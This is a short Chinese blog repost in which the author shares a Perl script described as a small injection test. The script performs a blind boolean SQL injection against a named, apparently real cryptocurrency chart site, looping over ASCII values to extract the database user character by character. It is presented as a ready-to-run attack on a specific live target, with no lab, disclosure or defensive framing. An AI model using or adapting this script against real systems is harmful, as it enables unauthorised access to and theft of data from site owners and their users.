码迷,mamicode.com
首页 > 其他好文 > 详细

测试一个注入小脚本

时间:2017-02-18 09:37:54      阅读:217      评论:0      收藏:0      [点我收藏+]

标签:not   war   ict   sel   数据   脚本   print   测试   bst   

 1 use warnings;
 2 use strict;
 3 use LWP::Simple;
 4 my @result;
 5 my $i=1;
 6 do{
 7     for(my $count=0;$count <=255;$count++){
 8         my $result = get("http://www.btc918.com//Chart/getJsonData?market=1‘ or (     select if(ascii(substr((select user()),$i,1))=$count,1,0))-- -");
 9         if($result =~ /120464662.8341/){
10                 print "OK!\n";
11                 print chr($count),"\n";
12                 push @result,chr($count);
13                 last;
14         }
15         print "Not $count \n";
16     }
17     $i++;
18 }while($i < 15);
19 print @result,"\n";

主要是猜测当前数据库名称

 

测试一个注入小脚本

标签:not   war   ict   sel   数据   脚本   print   测试   bst   

原文地址:http://www.cnblogs.com/perl6/p/6412216.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!